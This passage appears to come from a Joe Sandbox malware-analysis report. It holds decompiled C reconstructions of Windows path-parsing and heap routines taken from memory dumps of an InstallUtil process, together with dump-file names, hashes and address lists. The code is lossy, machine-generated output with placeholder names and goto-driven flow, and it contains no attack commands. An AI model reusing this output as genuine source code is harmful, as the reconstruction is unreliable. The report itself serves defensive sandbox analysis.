                      															if(_t336 == 0) {
                      																_t481 = _t479 + _t506;
                      																__eflags = _t481;
                      																 *(_t528 - 0x78) = _t481;
                      																E0130F3E0(_t479 + _t427, _t457, _t506);
                      																_t529 = _t529 + 0xc;
                      															} else {
                      																_t340 = _t336 - 1;
                      																__eflags = _t340;
                      																if(_t340 == 0) {
                      																	E0130F3E0( *(_t528 - 0xb8), _t457, _t506);
                      																	_t529 = _t529 + 0xc;
                      																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                      																} else {
                      																	__eflags = _t340 == 0;
                      																	if(_t340 == 0) {
                      																		__eflags = _t506 - 8;
                      																		if(_t506 == 8) {
                      																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                      																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                      																		}
                      																	}
                      																}
                      															}
                      															_t339 = 0x10;
                      															_t519 = _t519 + _t339;
                      															_t263 = _t528 - 0x8c;
                      															 *_t263 =  *(_t528 - 0x8c) - 1;
                      															__eflags =  *_t263;
                      															_t479 =  *(_t528 - 0x78);
                      														} while ( *_t263 != 0);
                      														goto L87;
                      													}
                      												}
                      											} else {
                      												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                      												 *(_t528 - 0xa2) = _t392;
                      												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                      												__eflags = _t469;
                      												while(1) {
                      													 *(_t528 - 0xe4) = _t511;
                      													__eflags = _t392;
                      													_t393 = _t427;
                      													if(_t392 != 0) {
                      														_t393 =  *((intOrPtr*)(_t469 + 4));
                      													}
                      													_t395 = (_t393 & 0x000000ff) - _t427;
                      													__eflags = _t395;
                      													if(_t395 == 0) {
                      														_t511 = _t511 +  *_t469;
                      														__eflags = _t511;
                      													} else {
                      														_t398 = _t395 - 1;
                      														__eflags = _t398;
                      														if(_t398 == 0) {
                      															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                      															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                      														} else {
                      															__eflags = _t398 == 1;
                      															if(_t398 == 1) {
                      																 *(_t528 - 0xa8) =  *(_t469 - 8);
                      																_t402 =  *_t469 & 0x0000ffff;
                      																 *(_t528 - 0xac) = _t402;
                      																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                      															}
                      														}
                      													}
                      													__eflags = _t511 -  *(_t528 - 0xe4);
                      													if(_t511 <  *(_t528 - 0xe4)) {
                      														break;
                      													}
                      													_t397 =  *(_t528 - 0x88) + 1;
                      													 *(_t528 - 0x88) = _t397;
                      													_t469 = _t469 + 0x10;
                      													__eflags = _t397 -  *(_t528 + 0x1c);
                      													_t392 =  *(_t528 - 0xa2);
                      													if(_t397 <  *(_t528 + 0x1c)) {
                      														continue;
                      													}
                      													goto L45;
                      												}
                      												_t475 = 0x216;
                      												 *(_t528 - 0x74) = 0x216;
                      												goto L45;
                      											}
                      										} else {
                      											asm("lock dec dword [eax+ecx*8+0x4]");
                      											goto L16;
                      										}
                      									}
                      									_t491 = E01394CAB(_t306, _t528 - 0xa4);
                      									 *(_t528 - 0x74) = _t491;
                      									__eflags = _t491;
                      									if(_t491 != 0) {
                      										goto L91;
                      									} else {
                      										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                      										goto L20;
                      									}
                      								}
                      								L16:
                      								 *(_t528 - 0x74) = 0x1069;
                      								L93:
                      								_t298 =  *(_t528 - 0xd0) + 1;
                      								 *(_t528 - 0xd0) = _t298;
                      								_t474 = _t474 + _t511;
                      								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                      								_t494 = 4;
                      								__eflags = _t298 - _t494;
                      								if(_t298 >= _t494) {
                      									goto L100;
                      								}
                      								_t494 =  *(_t528 - 0xcc);
                      								_t435 = _t298;
                      								continue;
                      							}
                      							__eflags = _t494[2] | _t494[3];
                      							if((_t494[2] | _t494[3]) == 0) {
                      								goto L15;
                      							}
                      							goto L12;
                      						}
                      						__eflags = _t301;
                      						if(_t301 != 0) {
                      							goto L92;
                      						}
                      						goto L10;
                      						L92:
                      						goto L93;
                      					}
                      				} else {
                      					_push(0x57);
                      					L101:
                      					return E0131D130(_t427, _t494, _t511);
                      				}
                      			}

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7e64935c42c32ee5b46da7fd440a439598d3a5c3c3a96fe68fc6de5f64fa4730
                      • Instruction ID: 527eac014dee62a4157387fb0c9d0496986dcba8fae2e808bb21b5663f5c9401
                      • Opcode Fuzzy Hash: 7e64935c42c32ee5b46da7fd440a439598d3a5c3c3a96fe68fc6de5f64fa4730
                      • Instruction Fuzzy Hash: 2D425AB1D01229CFDF25CF68C881BA9BBB5FF49308F1481AAD94DAB252D7349985CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E012E4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                      				signed int _v8;
                      				void* _v20;
                      				signed int _v24;
                      				char _v532;
                      				char _v540;
                      				signed short _v544;
                      				signed int _v548;
                      				signed short* _v552;
                      				signed short _v556;
                      				signed short* _v560;
                      				signed short* _v564;
                      				signed short* _v568;
                      				void* _v570;
                      				signed short* _v572;
                      				signed short _v576;
                      				signed int _v580;
                      				char _v581;
                      				void* _v584;
                      				unsigned int _v588;
                      				signed short* _v592;
                      				void* _v597;
                      				void* _v600;
                      				void* _v604;
                      				void* _v609;
                      				void* _v616;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				char _t161;
                      				signed int _t162;
                      				unsigned int _t163;
                      				void* _t169;
                      				signed short _t173;
                      				signed short _t177;
                      				signed short _t181;
                      				unsigned int _t182;
                      				signed int _t185;
                      				signed int _t213;
                      				signed int _t225;
                      				short _t233;
                      				signed char _t234;
                      				signed int _t242;
                      				signed int _t243;
                      				signed int _t244;
                      				signed int _t245;
                      				signed int _t250;
                      				void* _t251;
                      				signed short* _t254;
                      				void* _t255;
                      				signed int _t256;
                      				void* _t257;
                      				signed short* _t260;
                      				signed short _t265;
                      				signed short* _t269;
                      				signed short _t271;
                      				signed short** _t272;
                      				signed short* _t275;
                      				signed short _t282;
                      				signed short _t283;
                      				signed short _t290;
                      				signed short _t299;
                      				signed short _t307;
                      				signed int _t308;
                      				signed short _t311;
                      				signed short* _t315;
                      				signed short _t316;
                      				void* _t317;
                      				void* _t319;
                      				signed short* _t321;
                      				void* _t322;
                      				void* _t323;
                      				unsigned int _t324;
                      				signed int _t325;
                      				void* _t326;
                      				signed int _t327;
                      				signed int _t329;
                      
                      				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                      				_v8 =  *0x13bd360 ^ _t329;
                      				_t157 = _a8;
                      				_t321 = _a4;
                      				_t315 = __edx;
                      				_v548 = __ecx;
                      				_t305 = _a20;
                      				_v560 = _a12;
                      				_t260 = _a16;
                      				_v564 = __edx;
                      				_v580 = _a8;
                      				_v572 = _t260;
                      				_v544 = _a20;
                      				if( *__edx <= 8) {
                      					L3:
                      					if(_t260 != 0) {
                      						 *_t260 = 0;
                      					}
                      					_t254 =  &_v532;
                      					_v588 = 0x208;
                      					if((_v548 & 0x00000001) != 0) {
                      						_v556 =  *_t315;
                      						_v552 = _t315[2];
                      						_t161 = E012FF232( &_v556);
                      						_t316 = _v556;
                      						_v540 = _t161;
                      						goto L17;
                      					} else {
                      						_t306 = 0x208;
                      						_t298 = _t315;
                      						_t316 = E012E6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                      						if(_t316 == 0) {
                      							L68:
                      							_t322 = 0xc0000033;
                      							goto L39;
                      						} else {
                      							while(_v581 == 0) {
                      								_t233 = _v588;
                      								if(_t316 > _t233) {
                      									_t234 = _v548;
                      									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                      										_t254 = L012E4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                      										if(_t254 == 0) {
                      											_t169 = 0xc0000017;
                      										} else {
                      											_t298 = _v564;
                      											_v588 = _t316;
                      											_t306 = _t316;
                      											_t316 = E012E6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                      											if(_t316 != 0) {
                      												continue;
                      											} else {
                      												goto L68;
                      											}
                      										}
                      									} else {
                      										goto L90;
                      									}
                      								} else {
                      									_v556 = _t316;
                      									 *((short*)(_t329 + 0x32)) = _t233;
                      									_v552 = _t254;
                      									if(_t316 < 2) {
                      										L11:
                      										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                      											_t161 = 5;
                      										} else {
                      											if(_t316 < 6) {
                      												L87:
                      												_t161 = 3;
                      											} else {
                      												_t242 = _t254[2] & 0x0000ffff;
                      												if(_t242 != 0x5c) {
                      													if(_t242 == 0x2f) {
                      														goto L16;
                      													} else {
                      														goto L87;
                      													}
                      													goto L101;
                      												} else {
                      													L16:
                      													_t161 = 2;
                      												}
                      											}
                      										}
                      									} else {
                      										_t243 =  *_t254 & 0x0000ffff;
                      										if(_t243 == 0x5c || _t243 == 0x2f) {
                      											if(_t316 < 4) {
                      												L81:
                      												_t161 = 4;
                      												goto L17;
                      											} else {
                      												_t244 = _t254[1] & 0x0000ffff;
                      												if(_t244 != 0x5c) {
                      													if(_t244 == 0x2f) {
                      														goto L60;
                      													} else {
                      														goto L81;
                      													}
                      												} else {
                      													L60:
                      													if(_t316 < 6) {
                      														L83:
                      														_t161 = 1;
                      														goto L17;
                      													} else {
                      														_t245 = _t254[2] & 0x0000ffff;
                      														if(_t245 != 0x2e) {
                      															if(_t245 == 0x3f) {
                      																goto L62;
                      															} else {
                      																goto L83;
                      															}
                      														} else {
                      															L62:
                      															if(_t316 < 8) {
                      																L85:
                      																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                      																goto L17;
                      															} else {
                      																_t250 = _t254[3] & 0x0000ffff;
                      																if(_t250 != 0x5c) {
                      																	if(_t250 == 0x2f) {
                      																		goto L64;
                      																	} else {
                      																		goto L85;
                      																	}
                      																} else {
                      																	L64:
                      																	_t161 = 6;
                      																	goto L17;
                      																}
                      															}
                      														}
                      													}
                      												}
                      											}
                      											goto L101;
                      										} else {
                      											goto L11;
                      										}
                      									}
                      									L17:
                      									if(_t161 != 2) {
                      										_t162 = _t161 - 1;
                      										if(_t162 > 5) {
                      											goto L18;
                      										} else {
                      											switch( *((intOrPtr*)(_t162 * 4 +  &M012E45F8))) {
                      												case 0:
                      													_v568 = 0x12a1078;
                      													__eax = 2;
                      													goto L20;
                      												case 1:
                      													goto L18;
                      												case 2:
                      													_t163 = 4;
                      													goto L19;
                      											}
                      										}
                      										goto L41;
                      									} else {
                      										L18:
                      										_t163 = 0;
                      										L19:
                      										_v568 = 0x12a11c4;
                      									}
                      									L20:
                      									_v588 = _t163;
                      									_v564 = _t163 + _t163;
                      									_t306 =  *_v568 & 0x0000ffff;
                      									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                      									_v576 = _t265;
                      									if(_t265 > 0xfffe) {
                      										L90:
                      										_t322 = 0xc0000106;
                      									} else {
                      										if(_t321 != 0) {
                      											if(_t265 > (_t321[1] & 0x0000ffff)) {
                      												if(_v580 != 0) {
                      													goto L23;
                      												} else {
                      													_t322 = 0xc0000106;
                      													goto L39;
                      												}
                      											} else {
                      												_t177 = _t306;
                      												goto L25;
                      											}
                      											goto L101;
                      										} else {
                      											if(_v580 == _t321) {
                      												_t322 = 0xc000000d;
                      											} else {
                      												L23:
                      												_t173 = L012E4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                      												_t269 = _v592;
                      												_t269[2] = _t173;
                      												if(_t173 == 0) {
                      													_t322 = 0xc0000017;
                      												} else {
                      													_t316 = _v556;
                      													 *_t269 = 0;
                      													_t321 = _t269;
                      													_t269[1] = _v576;
                      													_t177 =  *_v568 & 0x0000ffff;
                      													L25:
                      													_v580 = _t177;
                      													if(_t177 == 0) {
                      														L29:
                      														_t307 =  *_t321 & 0x0000ffff;
                      													} else {
                      														_t290 =  *_t321 & 0x0000ffff;
                      														_v576 = _t290;
                      														_t310 = _t177 & 0x0000ffff;
                      														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                      															_t307 =  *_t321 & 0xffff;
                      														} else {
                      															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                      															E0130F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                      															_t329 = _t329 + 0xc;
                      															_t311 = _v580;
                      															_t225 =  *_t321 + _t311 & 0x0000ffff;
                      															 *_t321 = _t225;
                      															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                      																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                      															}
                      															goto L29;
                      														}
                      													}
                      													_t271 = _v556 - _v588 + _v588;
                      													_v580 = _t307;
                      													_v576 = _t271;
                      													if(_t271 != 0) {
                      														_t308 = _t271 & 0x0000ffff;
                      														_v588 = _t308;
                      														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                      															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                      															E0130F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                      															_t329 = _t329 + 0xc;
                      															_t213 =  *_t321 + _v576 & 0x0000ffff;
                      															 *_t321 = _t213;
                      															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                      																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                      															}
                      														}
                      													}
                      													_t272 = _v560;
                      													if(_t272 != 0) {
                      														 *_t272 = _t321;
                      													}
                      													_t306 = 0;
                      													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                      													_t275 = _v572;
                      													if(_t275 != 0) {
                      														_t306 =  *_t275;
                      														if(_t306 != 0) {
                      															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                      														}
                      													}
                      													_t181 = _v544;
                      													if(_t181 != 0) {
                      														 *_t181 = 0;
                      														 *((intOrPtr*)(_t181 + 4)) = 0;
                      														 *((intOrPtr*)(_t181 + 8)) = 0;
                      														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                      														if(_v540 == 5) {
                      															_t182 = E012C52A5(1);
                      															_v588 = _t182;
                      															if(_t182 == 0) {
                      																E012DEB70(1, 0x13b79a0);
                      																goto L38;
                      															} else {
                      																_v560 = _t182 + 0xc;
                      																_t185 = E012DAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                      																if(_t185 == 0) {
                      																	_t324 = _v588;
                      																	goto L97;
                      																} else {
                      																	_t306 = _v544;
                      																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                      																	 *(_t306 + 4) = _t282;
                      																	_v576 = _t282;
                      																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                      																	 *_t306 = _t325;
                      																	if( *_t282 == 0x5c) {
                      																		_t149 = _t325 - 2; // -2
                      																		_t283 = _t149;
                      																		 *_t306 = _t283;
                      																		 *(_t306 + 4) = _v576 + 2;
                      																		_t185 = _t283 & 0x0000ffff;
                      																	}
                      																	_t324 = _v588;
                      																	 *(_t306 + 2) = _t185;
                      																	if((_v548 & 0x00000002) == 0) {
                      																		L97:
                      																		asm("lock xadd [esi], eax");
                      																		if((_t185 | 0xffffffff) == 0) {
                      																			_push( *((intOrPtr*)(_t324 + 4)));
                      																			E013095D0();
                      																			L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                      																		}
                      																	} else {
                      																		 *(_t306 + 0xc) = _t324;
                      																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                      																	}
                      																	goto L38;
                      																}
                      															}
                      															goto L41;
                      														}
                      													}
                      													L38:
                      													_t322 = 0;
                      												}
                      											}
                      										}
                      									}
                      									L39:
                      									if(_t254 !=  &_v532) {
                      										L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                      									}
                      									_t169 = _t322;
                      								}
                      								goto L41;
                      							}
                      							goto L68;
                      						}
                      					}
                      					L41:
                      					_pop(_t317);
                      					_pop(_t323);
                      					_pop(_t255);
                      					return E0130B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                      				} else {
                      					_t299 = __edx[2];
                      					if( *_t299 == 0x5c) {
                      						_t256 =  *(_t299 + 2) & 0x0000ffff;
                      						if(_t256 != 0x5c) {
                      							if(_t256 != 0x3f) {
                      								goto L2;
                      							} else {
                      								goto L50;
                      							}
                      						} else {
                      							L50:
                      							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                      								goto L2;
                      							} else {
                      								_t251 = E01303D43(_t315, _t321, _t157, _v560, _v572, _t305);
                      								_pop(_t319);
                      								_pop(_t326);
                      								_pop(_t257);
                      								return E0130B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                      							}
                      						}
                      					} else {
                      						L2:
                      						_t260 = _v572;
                      						goto L3;
                      					}
                      				}
                      				L101:
                      			}

                      0x012e44f3
                      0x012e43ff
                      0x012e4405
                      0x012e4405
                      0x012e4405
                      0x012e42ac
                      0x012e428c
                      0x012e4282
                      0x012e4407
                      0x012e440d
                      0x0132e2af
                      0x0132e2af
                      0x012e4413
                      0x012e4413
                      0x00000000
                      0x012e41d4
                      0x00000000
                      0x012e41c3
                      0x012e41bd
                      0x012e4415
                      0x012e4415
                      0x012e4416
                      0x012e4417
                      0x012e4429
                      0x012e416e
                      0x012e416e
                      0x012e4175
                      0x012e4498
                      0x012e449f
                      0x0132e12d
                      0x00000000
                      0x0132e133
                      0x00000000
                      0x0132e133
                      0x012e44a5
                      0x012e44a5
                      0x012e44aa
                      0x00000000
                      0x012e44bb
                      0x012e44ca
                      0x012e44d6
                      0x012e44d7
                      0x012e44d8
                      0x012e44e3
                      0x012e44e3
                      0x012e44aa
                      0x012e417b
                      0x012e417b
                      0x012e417b
                      0x00000000
                      0x012e417b
                      0x012e4175
                      0x00000000

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 868c3ad9a2544164613e437a274261403c3b06bac6b19b697e2bea98abe73616
                      • Instruction ID: dce5a594fddad1ec4f5527fda3194c9b93c9fc1bcc2d18f845708fa60f4c5817
                      • Opcode Fuzzy Hash: 868c3ad9a2544164613e437a274261403c3b06bac6b19b697e2bea98abe73616
                      • Instruction Fuzzy Hash: 73F1B0706283528FC724EF18C485A7AB7E1FF99718F94492EF586CB291E734D881CB52
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E012F20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                      				signed int _v16;
                      				signed int _v20;
                      				signed char _v24;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				void* _v36;
                      				char _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				unsigned int _v60;
                      				char _v64;
                      				unsigned int _v68;
                      				signed int _v72;
                      				char _v73;
                      				signed int _v74;
                      				char _v75;
                      				signed int _v76;
                      				void* _v81;
                      				void* _v82;
                      				void* _v89;
                      				void* _v92;
                      				void* _v97;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				signed char _t128;
                      				void* _t129;
                      				signed int _t130;
                      				void* _t132;
                      				signed char _t133;
                      				intOrPtr _t135;
                      				signed int _t137;
                      				signed int _t140;
                      				signed int* _t144;
                      				signed int* _t145;
                      				intOrPtr _t146;
                      				signed int _t147;
                      				signed char* _t148;
                      				signed int _t149;
                      				signed int _t153;
                      				signed int _t169;
                      				signed int _t174;
                      				signed int _t180;
                      				void* _t197;
                      				void* _t198;
                      				signed int _t201;
                      				intOrPtr* _t202;
                      				intOrPtr* _t205;
                      				signed int _t210;
                      				signed int _t215;
                      				signed int _t218;
                      				signed char _t221;
                      				signed int _t226;
                      				char _t227;
                      				signed int _t228;
                      				void* _t229;
                      				unsigned int _t231;
                      				void* _t235;
                      				signed int _t240;
                      				signed int _t241;
                      				void* _t242;
                      				signed int _t246;
                      				signed int _t248;
                      				signed int _t252;
                      				signed int _t253;
                      				void* _t254;
                      				intOrPtr* _t256;
                      				intOrPtr _t257;
                      				unsigned int _t262;
                      				signed int _t265;
                      				void* _t267;
                      				signed int _t275;
                      
                      				_t198 = __ebx;
                      				_t267 = (_t265 & 0xfffffff0) - 0x48;
                      				_v68 = __ecx;
                      				_v73 = 0;
                      				_t201 = __edx & 0x00002000;
                      				_t128 = __edx & 0xffffdfff;
                      				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                      				_v72 = _t128;
                      				if((_t128 & 0x00000008) != 0) {
                      					__eflags = _t128 - 8;
                      					if(_t128 != 8) {
                      						L69:
                      						_t129 = 0xc000000d;
                      						goto L23;
                      					} else {
                      						_t130 = 0;
                      						_v72 = 0;
                      						_v75 = 1;
                      						L2:
                      						_v74 = 1;
                      						_t226 =  *0x13b8714; // 0x0
                      						if(_t226 != 0) {
                      							__eflags = _t201;
                      							if(_t201 != 0) {
                      								L62:
                      								_v74 = 1;
                      								L63:
                      								_t130 = _t226 & 0xffffdfff;
                      								_v72 = _t130;
                      								goto L3;
                      							}
                      							_v74 = _t201;
                      							__eflags = _t226 & 0x00002000;
                      							if((_t226 & 0x00002000) == 0) {
                      								goto L63;
                      							}
                      							goto L62;
                      						}
                      						L3:
                      						_t227 = _v75;
                      						L4:
                      						_t240 = 0;
                      						_v56 = 0;
                      						_t252 = _t130 & 0x00000100;
                      						if(_t252 != 0 || _t227 != 0) {
                      							_t240 = _v68;
                      							_t132 = E012F2EB0(_t240);
                      							__eflags = _t132 - 2;
                      							if(_t132 != 2) {
                      								__eflags = _t132 - 1;
                      								if(_t132 == 1) {
                      									goto L25;
                      								}
                      								__eflags = _t132 - 6;
                      								if(_t132 == 6) {
                      									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                      									if( *((short*)(_t240 + 4)) != 0x3f) {
                      										goto L40;
                      									}
                      									_t197 = E012F2EB0(_t240 + 8);
                      									__eflags = _t197 - 2;
                      									if(_t197 == 2) {
                      										goto L25;
                      									}
                      								}
                      								L40:
                      								_t133 = 1;
                      								L26:
                      								_t228 = _v75;
                      								_v56 = _t240;
                      								__eflags = _t133;
                      								if(_t133 != 0) {
                      									__eflags = _t228;
                      									if(_t228 == 0) {
                      										L43:
                      										__eflags = _v72;
                      										if(_v72 == 0) {
                      											goto L8;
                      										}
                      										goto L69;
                      									}
                      									_t133 = E012C58EC(_t240);
                      									_t221 =  *0x13b5cac; // 0x16
                      									__eflags = _t221 & 0x00000040;
                      									if((_t221 & 0x00000040) != 0) {
                      										_t228 = 0;
                      										__eflags = _t252;
                      										if(_t252 != 0) {
                      											goto L43;
                      										}
                      										_t133 = _v72;
                      										goto L7;
                      									}
                      									goto L43;
                      								} else {
                      									_t133 = _v72;
                      									goto L6;
                      								}
                      							}
                      							L25:
                      							_t133 = _v73;
                      							goto L26;
                      						} else {
                      							L6:
                      							_t221 =  *0x13b5cac; // 0x16
                      							L7:
                      							if(_t133 != 0) {
                      								__eflags = _t133 & 0x00001000;
                      								if((_t133 & 0x00001000) != 0) {
                      									_t133 = _t133 | 0x00000a00;
                      									__eflags = _t221 & 0x00000004;
                      									if((_t221 & 0x00000004) != 0) {
                      										_t133 = _t133 | 0x00000400;
                      									}
                      								}
                      								__eflags = _t228;
                      								if(_t228 != 0) {
                      									_t133 = _t133 | 0x00000100;
                      								}
                      								_t229 = E01304A2C(0x13b6e40, 0x1304b30, _t133, _t240);
                      								__eflags = _t229;
                      								if(_t229 == 0) {
                      									_t202 = _a20;
                      									goto L100;
                      								} else {
                      									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                      									L15:
                      									_t202 = _a20;
                      									 *_t202 = _t135;
                      									if(_t229 == 0) {
                      										L100:
                      										 *_a4 = 0;
                      										_t137 = _a8;
                      										__eflags = _t137;
                      										if(_t137 != 0) {
                      											 *_t137 = 0;
                      										}
                      										 *_t202 = 0;
                      										_t129 = 0xc0000017;
                      										goto L23;
                      									} else {
                      										_t242 = _a16;
                      										if(_t242 != 0) {
                      											_t254 = _t229;
                      											memcpy(_t242, _t254, 0xd << 2);
                      											_t267 = _t267 + 0xc;
                      											_t242 = _t254 + 0x1a;
                      										}
                      										_t205 = _a4;
                      										_t25 = _t229 + 0x48; // 0x48
                      										 *_t205 = _t25;
                      										_t140 = _a8;
                      										if(_t140 != 0) {
                      											__eflags =  *((char*)(_t267 + 0xa));
                      											if( *((char*)(_t267 + 0xa)) != 0) {
                      												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                      											} else {
                      												 *_t140 = 0;
                      											}
                      										}
                      										_t256 = _a12;
                      										if(_t256 != 0) {
                      											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                      										}
                      										_t257 =  *_t205;
                      										_v48 = 0;
                      										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                      										_v56 = 0;
                      										_v52 = 0;
                      										_t144 =  *( *[fs:0x30] + 0x50);
                      										if(_t144 != 0) {
                      											__eflags =  *_t144;
                      											if( *_t144 == 0) {
                      												goto L20;
                      											}
                      											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                      											goto L21;
                      										} else {
                      											L20:
                      											_t145 = 0x7ffe0384;
                      											L21:
                      											if( *_t145 != 0) {
                      												_t146 =  *[fs:0x30];
                      												__eflags =  *(_t146 + 0x240) & 0x00000004;
                      												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                      													_t147 = E012E7D50();
                      													__eflags = _t147;
                      													if(_t147 == 0) {
                      														_t148 = 0x7ffe0385;
                      													} else {
                      														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                      													}
                      													__eflags =  *_t148 & 0x00000020;
                      													if(( *_t148 & 0x00000020) != 0) {
                      														_t149 = _v72;
                      														__eflags = _t149;
                      														if(__eflags == 0) {
                      															_t149 = 0x12a5c80;
                      														}
                      														_push(_t149);
                      														_push( &_v48);
                      														 *((char*)(_t267 + 0xb)) = E012FF6E0(_t198, _t242, _t257, __eflags);
                      														_push(_t257);
                      														_push( &_v64);
                      														_t153 = E012FF6E0(_t198, _t242, _t257, __eflags);
                      														__eflags =  *((char*)(_t267 + 0xb));
                      														if( *((char*)(_t267 + 0xb)) != 0) {
                      															__eflags = _t153;
                      															if(_t153 != 0) {
                      																__eflags = 0;
                      																E01347016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                      																L012E2400(_t267 + 0x20);
                      															}
                      															L012E2400( &_v64);
                      														}
                      													}
                      												}
                      											}
                      											_t129 = 0;
                      											L23:
                      											return _t129;
                      										}
                      									}
                      								}
                      							}
                      							L8:
                      							_t275 = _t240;
                      							if(_t275 != 0) {
                      								_v73 = 0;
                      								_t253 = 0;
                      								__eflags = 0;
                      								L29:
                      								_push(0);
                      								_t241 = E012F2397(_t240);
                      								__eflags = _t241;
                      								if(_t241 == 0) {
                      									_t229 = 0;
                      									L14:
                      									_t135 = 0;
                      									goto L15;
                      								}
                      								__eflags =  *((char*)(_t267 + 0xb));
                      								 *(_t241 + 0x34) = 1;
                      								if( *((char*)(_t267 + 0xb)) != 0) {
                      									E012E2280(_t134, 0x13b8608);
                      									__eflags =  *0x13b6e48 - _t253; // 0x0
                      									if(__eflags != 0) {
                      										L48:
                      										_t253 = 0;
                      										__eflags = 0;
                      										L49:
                      										E012DFFB0(_t198, _t241, 0x13b8608);
                      										__eflags = _t253;
                      										if(_t253 != 0) {
                      											L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                      										}
                      										goto L31;
                      									}
                      									 *0x13b6e48 = _t241;
                      									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                      									__eflags = _t253;
                      									if(_t253 != 0) {
                      										_t57 = _t253 + 0x34;
                      										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                      										__eflags =  *_t57;
                      										if( *_t57 == 0) {
                      											goto L49;
                      										}
                      									}
                      									goto L48;
                      								}
                      								L31:
                      								_t229 = _t241;
                      								goto L14;
                      							}
                      							_v73 = 1;
                      							_v64 = _t240;
                      							asm("lock bts dword [esi], 0x0");
                      							if(_t275 < 0) {
                      								_t231 =  *0x13b8608; // 0x0
                      								while(1) {
                      									_v60 = _t231;
                      									__eflags = _t231 & 0x00000001;
